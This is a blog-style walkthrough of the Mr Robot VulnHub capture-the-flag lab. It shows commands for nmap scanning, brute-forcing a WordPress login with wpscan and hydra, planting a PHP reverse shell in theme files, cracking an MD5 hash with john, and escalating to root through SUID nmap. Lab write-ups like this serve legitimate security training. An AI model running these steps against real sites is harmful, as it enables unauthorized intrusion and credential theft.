Today I am writing about the Mr Robot vulnhub walkthrough made available by vulnhub. It is indeed a Mr Robot inspired virtual machine and luckily it is a VirtualBox ova and not a VMWare collection. This vulnerable machine is really something else, something special. I have never seen one so convincingly well crafted and you’ll see what I mean once we get started in on getting root.
- Vulnerable machine from vulnhub
- Kali Linux virtual machine (VirtualBox)
To get the virtual machine to run properly I had to set the Network settings to a host-only network vboxnet1 that has a DHCP server enabled.
What if I told you buffer overflows ear easy, see why in my buffer overflow guide!
Table of Contents
Information Gathering
Doing an nmap scan of the target reveals that port 80 is open. I do initial nmap scans with a quick nmap -sV -sC -A 10.0.2.16.
It is common practice when a webserver is exposed as a running http service to check the robots.txt file on the server. Going to /robots.txt reveals an entry for key-1-of-3.txt.This leads to finding the first of 3 keys, found by going to http://10.0.2.16/key-1-of-3.txt. The key is 073403c8a58a1f80d943455fb30724b9 which makes me wonder if it is an MD5 hash.
Attack the WordPress Site
Using nmap to do an initial enumeration of the wordpress service is done by nmap -sV -p 80 10.0.2.16 –script=http-wordpress-enum.nse I continue on to do some more digging. Doing a wpscan to enumerate the vulnerable plugins vp does not really go anywhere.
wpscan –url 10.0.2.4 –enumerate vp
So instead I backtrack for a minute and look at the other files on the webserver. Looking at fsocity.dic it seems that this could be a password dictionary that can be used for brute forcing. I grab the file with a wget http://10.0.2.16/fsocity.dic. After getting the file I want to try brute forcing the wordpress page. Now at this stage most people would suggest using hydra but I’ll use wpscan again. This time with the password flag included.
wpscan –url http://10.0.2.16/wp-login –passwords fsocity.dic -U elliot
Here is the hydra version of the wpscan password brute forcing just for those who are interested.
hydra -L logins.txt -P fsocity.dic 10.0.2.16 -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’
My wordpress brute forcing efforts pay off and I now have the credentials for an admin of the site.
Put a Shell In the WordPress site’s PHP
WordPress runs PHP correct? Then it can execute the PHP that you want it to. By placing the code found in a web shell from /usr/share/webshells/php-reverse-php. You can also use p0wny.
Once the PHP is now in the archive.php file you have to execute it by sending a web request to /wp-content/themes/twentyfifteen/archive.php and that gets a shell back to a netcat listener.
You can also place the shell code into 404.php.
After you edit the 404.php file to now include the php reverse shell code there are two new steps to take. First setup a netcat listener on the port you changed the reverse shell code to use that you uploaded. Second call the script. I literally got a shell back by calling http://10.0.2.16/anything!
Now that I have those credentials. by going to http://10.0.2.16/wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen and replacing the php with the shell, I get mine from pentestmonkey. Kali comes with suitable shells found in /usr/share/webshells/php however. Lost? You can also get to the editor page by going to appearance then editor.
Privilege Escalation
Moving around I see there is a home directory in /home/robot.
$ cd home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
I proceed to crack the hash which is obviously an MD5 hash according to the filename, using john. I get this done by a quick john –format=raw-md5 crackme.txt. Now I have the password, abcdefghijklmnopqrstuvwxyz.
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
After switching to the new user, robot with the cracked password I move around to find the second flag. This is afterall a CTF walkthrough right.
robot@linux:~$ whoami
whoami
robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
To find the third flag some more privilege escalation is what is needed. The technique I use is to look for files where the SUID bit is set. With the SUID bit set for a file (shown by the x ) a user can run the binary with the permissions of the original owner of the file. So in this example, with this machine nmap happens to be one of those cases. What that means is I can run nmap as root.
Googling nmap SUID exploit shows a million examples and I quickly employ one. The exploit is specifically to use the –interactive flag in order to then escape the program into a bash shell. This bash shell will then have the privilege of root.